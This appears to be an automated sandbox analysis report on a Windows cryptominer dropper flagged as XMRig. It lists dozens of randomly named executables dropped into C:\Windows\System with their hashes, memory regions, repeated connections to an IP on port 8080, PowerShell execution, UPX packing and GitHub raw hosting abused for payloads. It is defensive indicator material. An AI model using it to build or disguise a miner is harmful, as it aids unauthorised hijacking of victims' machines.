C:\Windows\System\xQfSJjy.exe

C:\Windows\System\HcQLCwy.exe

C:\Windows\System\HcQLCwy.exe

C:\Windows\System\TnNyCnh.exe

C:\Windows\System\TnNyCnh.exe

C:\Windows\System\JRfQRQI.exe

C:\Windows\System\JRfQRQI.exe

C:\Windows\System\oAnwgte.exe

C:\Windows\System\oAnwgte.exe

C:\Windows\System\cIlrpuH.exe

C:\Windows\System\cIlrpuH.exe

C:\Windows\System\TyetFZu.exe

C:\Windows\System\TyetFZu.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2928-0-0x00000000000F0000-0x0000000000100000-memory.dmp

memory/2928-2-0x000000013F380000-0x000000013F772000-memory.dmp

C:\Windows\system\oDPBQIQ.exe

MD5 c19e842b248e176e2c617d777da5d4cd
SHA1 5aaf37785db47af26eb0cdfebf676a2b625ac11f
SHA256 1aecf196fee84970f47ea6d495b51d20831aaa59485bf1b500608d6c9de19af2
SHA512 5e5d53eccafa7a705a98f2de3fc5c239c3627c6637aa2fa1265ae6b6b32998b7a6d9fc37ab11970776579db53c0e5ab7525073a284160c9815d15a2616b2ba3e

\Windows\system\TIWsFDf.exe

MD5 6aed15523dca3a72608e0d8c58a30e06
SHA1 089664eb8597bbc8ebec4124b92534ac0757fb91
SHA256 07a2173a17cd682e7a503ea37594ea1e966dd8afdeb969caadd2d8b422549dea
SHA512 8947fe6a05014b878bc7638d2454c56b2ea7df962a98ac33c3a212f17e91f66a4ae116cdc074d08aa4829f0c0baef14f3035efc04b3369dac3ef593a4187b734

\Windows\system\JnefrXJ.exe

MD5 fd60e68feebeafbfac54b6c5e6d969c1
SHA1 8da5b6624d6d758b7b769e7e1e0a5a624b1ee593
SHA256 8521419ed332c93b888478203f8e82a30b21cf8c0eb669af83d2cf726f3ab081
SHA512 2d3ab8275c32998d4b7810ec0f1bd5324013c4a123b1d986482f282a70b0f5efe969feeea0e62b42c988b9a1a4d95951356ed5e793f9ad5417d6c788b13f1890

\Windows\system\KRiNZZp.exe

MD5 e52380cece1459a6670924741bbd554c
SHA1 0b2624f76cdeeacab3d33c68d7ba4114e1b5b003
SHA256 d010f5456833e140e022d147cb7a25e563e18357011fc8404e04cbc356bf30a5
SHA512 c31b9a559472ae25ca842f27145a23c330a77ed29d5bc3d84c3d12788823ab33825b23b7ee5f406d9e35081046fb592cf4529507ec99c4d84ad74329e21c0095

\Windows\system\hXsTflt.exe

MD5 ee19da122894dda8b9e5447e9ee61d04
SHA1 fcec9a449f53d3418314b7c79603c9867178e95d
SHA256 1f53f32368168c06301f2aa345d2991b98dc0b448c20814835ad78f5f5c98be9
SHA512 c824f1d707d4ff2c04b1375bd266a7f4125f6a7a4cf3004404a91935671bb23da3cc8e1dedc0ff0ee43d31d7e6daa18b22d807714a4b98e36ee4eb940c183e82

memory/2748-82-0x000000013FEF0000-0x00000001402E2000-memory.dmp

\Windows\system\WiVyPKP.exe

MD5 41c718571efba9eef669aeb0f110fb3b
SHA1 14d8476cd2ada29515b18d221582aa2ea2a0c17d
SHA256 36dfc501bb703fb1576fcd93c7cd383cf7d0fb843d9c73acff7a5014965e012e
SHA512 ebdcdf0377032f2a44e9e2c6d8ac03b6d4dde385f67ab453873b1a407e904bb26dab0398e308340d0ccda3d746137c62fd5d364e885fa3f82c200a1d3b8cacfc

C:\Windows\system\POdHwHR.exe

MD5 b64fa71baf6ea3b315b0c86a2df76f6d
SHA1 21febc61d4c38c8b99c5c45f7c966ea0de36bd59
SHA256 0d57c05eecb654ae0ef581f39a7ce60b0a3f8ab122e90d6bd08cc1ef96deb0c2
SHA512 87e9dc4be22bfcfa3a355d15c3ca1d5634b6d9a06dcb6a993d569c3bf9c321b05b7703eb2ef6eb71312c5cc63f54e89c1833d7de53fb0adcdcf44e62c0cfe5ed

\Windows\system\UpoUfzq.exe

MD5 9b651f249fc2f99dc1557a43addc9418
SHA1 b23ef42e5e5ef34b2eb9fe3946de3f30f70562ea
SHA256 a7532b7bee969a498218f22f2f87db1161d08d67164ec6cd0a26906c74cfdbb8
SHA512 91dab9b9e1da31089d8fdea7fea313c0e0854d2849104e2603486309da7f287c02f4567b319c8558b13921c0d4a6b4b595f12737948fb72e60a40b9510883940

C:\Windows\system\WQVgMPI.exe

MD5 9d27163b9b6bff9a3df25125887d6b59
SHA1 7f33a7849a53b35010d2626354c24e85c4d8f587
SHA256 76bfeaef9ffe9f1278be4d63df88df88dc0b542a7ed252b1de6654ad5751be13
SHA512 cceb0dd77167686ce75d68c597612828ca3b8e14eec7169b12d8494eb6da3652bcb13b0027f7cf8c3c7a1c566c09362b1c4f5172d5cdda4758428934d258a0ee

\Windows\system\SGUyGDO.exe

MD5 45051c37339de2a634eff17877dafee1
SHA1 b38da6738ca410837cb7b6257ba800f1999279e5
SHA256 538e7249f647c9874fe9b0fd79646a39307b0862475e2432d152c6621e54d411
SHA512 54420be174c105a8b9db6d6d44cd7e83dd6546311713d4470209157bef0566ce6ce01c741a4a3041c3a29e0e2154dcfe6698dc945fb2ecc246135bd85b6c01f5

C:\Windows\system\PafKfmd.exe

MD5 fde3f46849f3a5a3bd2fce3f85c29bcb
SHA1 1a4b5d869aa26e3358961240a4807df13f1e4bc8
SHA256 d7aadb0a364fe011b2230d40daacf005502cf1ac496cdc1fe3813711031baf99
SHA512 f3130cce34c1d07fa918f532afde85de159a731981b51cd4928e0b0db4c975a8b657f8176be8c5b814f940b88c4d5795ac8af1ae76c60fd276011e8dccd2d585

C:\Windows\system\hPtQwZO.exe

MD5 dae722c7df5b51a5722600f4daa0f37e
SHA1 798d9fefb5da52c3f4d63db902c5a401cca7f7a6
SHA256 7fe89ab2d418a5f48d56019fea28694e761c25d362b530a90c11fd9334be182c
SHA512 2ab74291d298145b142bfdb0db9d81d6847a59b0f636d3a94137213e982f0779a338df47378b04424a52cccd3598a19255ebcc54dcb55605e58fd8503fa0f1e2

C:\Windows\system\zGcQlbp.exe

MD5 295c59d61f7ec913cc43241655be24c2
SHA1 0794d831f7ccdfadbadd303c652c5f64eac8c1af
SHA256 70cbe187eb0eec31f620a3494510ff78acd4fcd4d4a113c03d4861730ed8f556
SHA512 d0e9516826323b778d0f689179283c15e7e78e4bc3832e2d741a9b33d28fa49e28d610802ca2c3658901fe47eb11518bad05afd8dd0ad302dcefa8ab73143d0d

\Windows\system\AsmAnry.exe

MD5 4708e0ef282282c556a4cce8971c11f7
SHA1 91a7becba43fb83897484915cef5c687d92e4f36
SHA256 2f83c4367ff848081a32005419c6b7d41c6ab5446594429f2eb4f134249369b0
SHA512 efc88b4432fc3d218c494083d26dc07b8cc3b542b1ba3d53fc8e50f443e4a8a3ba4588a7ab6ffd08b6c24f9710fc20644bb26ec5931d8e97e14b8c179e4ee2e4

memory/3056-121-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

C:\Windows\system\YokvJNy.exe

MD5 160005a746aa2fa141369f81b81c8ff6
SHA1 5e19acdfff6e3c3b53506cd0a65e76c5095a5fe5
SHA256 315834ac237183cb95a803c66fff61c429d71f805bcd7a0ca9e982dbeed0fe68
SHA512 15f83d3c49a2450159567a2a1180654f249e2d9c10871cf7258dcdf397a16e17114f0461aa7eb46f4805effc75a4363af26e30789621069f4792086970bc7385

C:\Windows\system\RKjJVMS.exe

MD5 b99ae2937e51d9f7a72b693725e31b73
SHA1 722bddf70a296a399d6eecaa8353b6ab96ed8c75
SHA256 e9e28355e98fca047c4ee863cbee0217faf59090a7f1510946bd61c0ea841375
SHA512 6c56720d64a8aaf5f089bedfa3285f4fff72e92838cbf1aa3a0dfbb4070b32802341afa06743a30a6b7371b6a321504591a0c432db2a67f12fc4bd44f08836ec

C:\Windows\system\HFSGnQP.exe

MD5 45f95b00a39a398fbb38b72f42ab4b3d
SHA1 5b66be6619cda6eb02b4e30e169ff506771809d4
SHA256 ff97d6ba70182b0efef1c437885b9765758747fb027e02b46afb97733fde9193
SHA512 18a1cd7a765471790d92b87e20dd8dfcd5aca0235d91173de512f3f04ef0b13b164d78a86dd401ed64e4faf8f10a9848e5a68a5846111d2c8db79b0e0d4e2c35

memory/2928-111-0x00000000035C0000-0x00000000039B2000-memory.dmp

C:\Windows\system\SLDZdsd.exe

MD5 78f25b7399223bda4fe0e0f2ecf1a751
SHA1 5339e7588c11d23c5ff4f8ab3ce37fb9428ef7f0
SHA256 410b8fa7d93ded8ac75a0de88b7f4d8cbf2ae9df17fc84fc691d8d0f3f33a7f1
SHA512 5d57d92e6600e988a6e202d10a8bccc0960bc98ea847c8cc327cc0862f2e5fa2d0371630d38c75b3d75e0199169a6bc26818137c54b8c5bee8b519d258584d3b

C:\Windows\system\KrGWRBQ.exe

MD5 9461756145cf7de3ab81b15ebb9d3143
SHA1 da5f6c7c3f793d8327566b553d417bee8c1f415d
SHA256 6d0a35b4a61e3533884610c0f70650d3c6ea04d2e13f13d9f3e68e677e1a0636
SHA512 b69ec9a15252cca53ee5b8a889040ac73f633c2d147dee036bfff4fc47d799f3e0afadc7bccf21b5566febcfc0a6ab74f53fb6d8de83453b7ca935a96ad4e467

C:\Windows\system\ZSubHxO.exe

MD5 99c9444cac39475dd93dad144936ce3b
SHA1 72c39205f468476f23e2fc11f0bdb46b2f8fef5e
SHA256 c8d43a5b733f69a0288e558711bbfc7774170c68e68d56cece6dc96bbeab5089
SHA512 91bc5f115b9016d88252478e2e430600e321955defef07a34b021992f11948df0c5c038d63b5528dca1c948ff5057cf34a45a5b7ebd91650415d7fc4f0b410b8

C:\Windows\system\CHfzTcE.exe

MD5 fad24a1b5c2d1c700ef17c636a24ab9f
SHA1 8c925678080169bf0f2e394ffc32405b16ae156b
SHA256 545f728be6b91d5157cc5571d19d7e46dd6668c1ad99b2b8cb3d5af1d5a63614
SHA512 87c891ecf14020ffe8e022fa3d125d002884d0ab95f292531db3fa3baf9b9fc741c0fc4568d4ffbd7c4954438292d63223a770116750f67e43dd1744a6627f92

C:\Windows\system\PQfanMj.exe

MD5 ed81b19af9952d58af3c6810c3b63421
SHA1 c695f0826ce0c0b1dcd7ef5765019ac0ec8e2212
SHA256 13ba55c566b6f8020d5bb9451edd40fdae9e38256e8e256973de3a8e4c67817e
SHA512 ca36fabc6fe628a58c6ee0626028146672cab61fdceb21f6a81be20b9f4f00f73f6d9c62411b1f6607eebc9221002f9e38f83d8ca3b99d40ab69d4608bf0cce5

C:\Windows\system\kCbWrSz.exe

MD5 2bcea997d9484460aaa6d16b3a11d90a
SHA1 da27f7c4c904a5c995cb8fc8645143ece71d7755
SHA256 b5c3f251a4fa9c996386a78664d6e0440987ec93d65d9d01d4d95e2c095479f4
SHA512 065beecb350999806476c400a2a9f7144a56059486b1a0dbb99ef6a508e825b52cf4af83af1b22a147e07bde5f47aa8e8f3bf49f6a6d076d2ec1580ec4d8b19e

C:\Windows\system\wYazokD.exe

MD5 ea61c6f663bb6f780d13f8ea76a875a2
SHA1 b3d281dfb017018ff2e88ea4d120de6e0b6fb0a9
SHA256 d86400dc6dc5c727af5c4116c584c967dcc164c4adabaac2dd3a10e2b30cd18d
SHA512 ad10869f2924419bb9f66e3da01c1ec72703e57c26d73da564daf90f4da1ad333bcaf1d4fb1eea708d398a74ff7ca6a2f25f8a0d2a121ab3e9368022acb6c915

memory/2928-110-0x00000000035C0000-0x00000000039B2000-memory.dmp

memory/2928-109-0x00000000035C0000-0x00000000039B2000-memory.dmp

memory/2928-108-0x000000013FF60000-0x0000000140352000-memory.dmp

C:\Windows\system\fBfEBeF.exe

MD5 75593d0c4a7d4705d7a3e8c5b912ee60
SHA1 e56142da4e0aebdd0af6f459d8c07a891794bda3
SHA256 92e6692bca1fe4e7e66d340774ea70949137c39c476e73669a9bfea55922604a
SHA512 f84042051f84bdf9ce0203d7351ae8e1a91df67b8050b430862bfa9fa155277e85e0a0ec20ec4dd5ee068efcf697aa2c07bf5f6936e52aa9d08b412c2b8b860b

C:\Windows\system\AayZXHV.exe

MD5 5bbbf49ec93330440da53ff55993ce0e
SHA1 e7d0eb18eb77218f4ab603219b91da057a15dd14
SHA256 90d08ba5b490ec92c3ecce4371e2ad44c86265dc721f3131ec108d21dd94930e
SHA512 4a520c050f68a9a7bbd3f35eed0488fa8e609b28074427e4766d6521507b52c178c671ca63dd1e407278d730328e93933619699faa21b4a9bceb518ad59d5b58

\Windows\system\bWaLAtG.exe

MD5 1cc4d623fe867f0c6a761fbc83adce1f
SHA1 e4ff192e89ce66e01096e3de6995185a066ef332
SHA256 bba878efc02c601b120acfd33b961dd34f819b29762e33b3c92c43ab5e3637c7
SHA512 55269dec05d8867c0d1e76cda53afe3fd1460c9a9b90ae28c982dd984f3ebddc084fe48ab2517400090c15de3e888b04d1fff62a854c02de8430dde0295bd15a

C:\Windows\system\yjySaDz.exe

MD5 76ffaeebb517fd5739566c1bec81f668
SHA1 3b3cae02691d13cf2658798681102dbc208d782a
SHA256 f33cc2a1fa711f5eb8c18768640b7eb324aefa7b4d05ab45383e04bc4c0f392f
SHA512 411da331254070adce0e9400b4065655d602f7928c9e06102fa53b3b6129df59f64977aa4f443a155d671d7fb6ac821015f3a67b28c7ac59680cd1cf7f40e5c7

memory/2928-70-0x000000013FBF0000-0x000000013FFE2000-memory.dmp

C:\Windows\system\SyEIImC.exe

MD5 c11f9de4d59927b342183a8460af94e1
SHA1 48cf4e3f3da939adc72002df9ab762df42a96209
SHA256 09bb5744b62b3c94360a43a2b4e49b13ef5c871cbf7d3dfb2383873d98d90218
SHA512 20251f0e74e074a9b98903b10224d0bb8d2727c9e69c6f1bb9ec7571064098934e1e3168fa8672364a5f36163f95d2391282f3129f6dfaeacd29655d5597a19e

memory/2928-61-0x0000000003220000-0x0000000003612000-memory.dmp

memory/2696-60-0x000000013F130000-0x000000013F522000-memory.dmp

memory/2928-59-0x0000000003220000-0x0000000003612000-memory.dmp

memory/2928-57-0x000000013FA20000-0x000000013FE12000-memory.dmp

memory/2672-55-0x000000013F590000-0x000000013F982000-memory.dmp

memory/2668-54-0x000000013FDC0000-0x00000001401B2000-memory.dmp

memory/2928-53-0x0000000003220000-0x0000000003612000-memory.dmp

memory/2928-52-0x000000013FEF0000-0x00000001402E2000-memory.dmp

C:\Windows\system\seKOSuA.exe

MD5 c27f788755ebd5858ae5afcf458f346e
SHA1 1541ba94f4dfbd6fb61a5773e8d645f865b137c4
SHA256 5f4446f82f8f437bf2354f0f681df13a908aca07358a408e3108cf25ba029bd0
SHA512 4ac905c7eb623fce691a1a49b66a2a1ea65a31c0c13ed722ab6169e61aac3f052e2441c18fe7a6a30e0c861bc823115edee3ff96c4d42aef61b45f282c944cd2

memory/1088-47-0x000000013F200000-0x000000013F5F2000-memory.dmp

memory/2808-27-0x000000013F590000-0x000000013F982000-memory.dmp

C:\Windows\system\qbtqdta.exe

MD5 eccd090a4647c7a476e781ea377c3414
SHA1 ede224f1e05872e0d25c88d7c9d87166a40872a0
SHA256 72563b585299c18e38b59bf5b3f0700a2b138d52e03cf5efa8cfd1671fe11a37
SHA512 84ee768e85df810b1368a9b25a1f98b982f48959537360d2d125ca36016bb2f12746e03aa2b7226acb3e64a40c891efd86d26cca9ef4ab4c663fe8f32b5d4ca8

memory/3056-127-0x0000000002040000-0x0000000002048000-memory.dmp

memory/2928-92-0x00000000035C0000-0x00000000039B2000-memory.dmp

memory/2200-89-0x000000013FF60000-0x0000000140352000-memory.dmp

memory/2556-72-0x000000013FBF0000-0x000000013FFE2000-memory.dmp

memory/2928-65-0x0000000003220000-0x0000000003612000-memory.dmp

memory/2928-18-0x0000000003220000-0x0000000003612000-memory.dmp

C:\Windows\system\tqhAMxb.exe

MD5 5c18049878ae5343041d452988945b6e
SHA1 806bd6479b8661256779fe366bc791273d931fe0
SHA256 1b2faa190dd21d6e6e230a9effa1e4cf44488d3a35dbd163eee48374ab4a5ac6
SHA512 81c47d08f4b222c699c4a1473d640fdb6a8b734d8b73050fb673a4b6f7830e528dc3b297d73c5307a9d6d8375e4dc52040501dafcd52f64bebdfe620d1c50169

memory/2668-4494-0x000000013FDC0000-0x00000001401B2000-memory.dmp

memory/2672-4490-0x000000013F590000-0x000000013F982000-memory.dmp

memory/2200-4485-0x000000013FF60000-0x0000000140352000-memory.dmp

memory/2556-4484-0x000000013FBF0000-0x000000013FFE2000-memory.dmp

memory/2696-4483-0x000000013F130000-0x000000013F522000-memory.dmp

memory/2808-4481-0x000000013F590000-0x000000013F982000-memory.dmp

memory/1088-4480-0x000000013F200000-0x000000013F5F2000-memory.dmp

memory/2748-4477-0x000000013FEF0000-0x00000001402E2000-memory.dmp

memory/2928-6495-0x000000013F380000-0x000000013F772000-memory.dmp

C:\Windows\system\dNrxovD.exe

MD5 67d893d1a2095d39d451d08ee1cc05e9
SHA1 dad7ef4487e41ff3c3e600250e691ed16832dc94
SHA256 cc871666e89dd430f5e3dc9cc361cd1a4ecf7214b4b8daeb86cca2257079f3ce
SHA512 7799e4db272ac6c136cb55f2e50c1582a5027767dc6d148dbf159fdb6f776a047cf2ac573fbb2f2ca5a994173cf0465c93ef3f6e6c86e8981136e854def9801d

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-14 12:21

Reported

2024-06-14 12:23

Platform

win10v2004-20240508-en

Max time kernel

146s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\gqRpmmZ.exe N/A
N/A N/A C:\Windows\System\UySOCYI.exe N/A
N/A N/A C:\Windows\System\UJkJjQw.exe N/A
N/A N/A C:\Windows\System\CIKkDbp.exe N/A
N/A N/A C:\Windows\System\xqdMkKZ.exe N/A
N/A N/A C:\Windows\System\jKKmQGD.exe N/A
N/A N/A C:\Windows\System\mBjWSPJ.exe N/A
N/A N/A C:\Windows\System\BiNUTgB.exe N/A
N/A N/A C:\Windows\System\RBDSzcv.exe N/A
N/A N/A C:\Windows\System\iFwzIsZ.exe N/A
N/A N/A C:\Windows\System\alnrRld.exe N/A
N/A N/A C:\Windows\System\BZTzxwR.exe N/A
N/A N/A C:\Windows\System\KlyogXL.exe N/A
N/A N/A C:\Windows\System\WmuOIPa.exe N/A
N/A N/A C:\Windows\System\DqXWifd.exe N/A
N/A N/A C:\Windows\System\tZwFJue.exe N/A
N/A N/A C:\Windows\System\EIjlViE.exe N/A
N/A N/A C:\Windows\System\ZLIawkm.exe N/A
N/A N/A C:\Windows\System\oEanhxH.exe N/A
N/A N/A C:\Windows\System\REAiWIb.exe N/A
N/A N/A C:\Windows\System\aBsZZRm.exe N/A
N/A N/A C:\Windows\System\MDEDqAo.exe N/A
N/A N/A C:\Windows\System\lGVECJQ.exe N/A
N/A N/A C:\Windows\System\eHyOepf.exe N/A
N/A N/A C:\Windows\System\WunfKWr.exe N/A
N/A N/A C:\Windows\System\kTOovsA.exe N/A
N/A N/A C:\Windows\System\nieXFrU.exe N/A
N/A N/A C:\Windows\System\hJCvsMp.exe N/A
N/A N/A C:\Windows\System\fVQucNi.exe N/A
N/A N/A C:\Windows\System\joCqCjJ.exe N/A
N/A N/A C:\Windows\System\XzYGkhv.exe N/A
N/A N/A C:\Windows\System\tZWspQQ.exe N/A
N/A N/A C:\Windows\System\VlUHuaA.exe N/A
N/A N/A C:\Windows\System\UikOHuY.exe N/A
N/A N/A C:\Windows\System\jjVtwdV.exe N/A
N/A N/A C:\Windows\System\cWZqtAn.exe N/A
N/A N/A C:\Windows\System\VUJEZkl.exe N/A
N/A N/A C:\Windows\System\QRCPxIP.exe N/A
N/A N/A C:\Windows\System\TtuAQgO.exe N/A
N/A N/A C:\Windows\System\WfNYMrk.exe N/A
N/A N/A C:\Windows\System\iDiaDIZ.exe N/A
N/A N/A C:\Windows\System\iXVaBvK.exe N/A
N/A N/A C:\Windows\System\udDzOId.exe N/A
N/A N/A C:\Windows\System\QYIsdko.exe N/A
N/A N/A C:\Windows\System\nnpKrNc.exe N/A
N/A N/A C:\Windows\System\dtazAvE.exe N/A
N/A N/A C:\Windows\System\aZXVnRp.exe N/A
N/A N/A C:\Windows\System\PvYcesi.exe N/A
N/A N/A C:\Windows\System\lyeHDEt.exe N/A
N/A N/A C:\Windows\System\uhUnYAN.exe N/A
N/A N/A C:\Windows\System\cWgTsmK.exe N/A
N/A N/A C:\Windows\System\ozuTckC.exe N/A
N/A N/A C:\Windows\System\HBnOsPZ.exe N/A
N/A N/A C:\Windows\System\avaYCus.exe N/A
N/A N/A C:\Windows\System\hAzudfU.exe N/A
N/A N/A C:\Windows\System\MLVQkqJ.exe N/A
N/A N/A C:\Windows\System\oeHqGzs.exe N/A
N/A N/A C:\Windows\System\HUAULgu.exe N/A
N/A N/A C:\Windows\System\lKXfAVy.exe N/A
N/A N/A C:\Windows\System\UGRomCV.exe N/A
N/A N/A C:\Windows\System\jTcEAvh.exe N/A
N/A N/A C:\Windows\System\WNgPivb.exe N/A
N/A N/A C:\Windows\System\tLMybnU.exe N/A
N/A N/A C:\Windows\System\YHxcLKK.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\kgbblSm.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\fpBhcql.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\uoqvxar.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\HexEGGa.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\CAoMlgL.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ILYWisD.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\jTvtpmd.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\bVRTDeB.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\WqrqeZp.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\cDpDHXY.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\TTKLxqH.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\EiblwVw.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\wvHhHQo.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\IekbZiK.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\IlUUeVA.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\iKhKKzc.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\gqRpmmZ.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\VelabhX.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\rKOomKD.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\AWpleQe.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\tjxswpE.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\wGQPVEa.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\gRxBjSC.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\dNHbBli.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\KsxQOck.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\sQZKQaC.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\ePlgzAB.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\uVpyxZL.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\hVAPZCw.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\avaYCus.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\vjUJQSC.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
File created C:\Windows\System\GRkQUWO.exe C:\Users\Admin\AppData\Local\Temp\bef7bdabcc91a2c7f223f60011a37b80_NeikiAnalytics.exe N/A
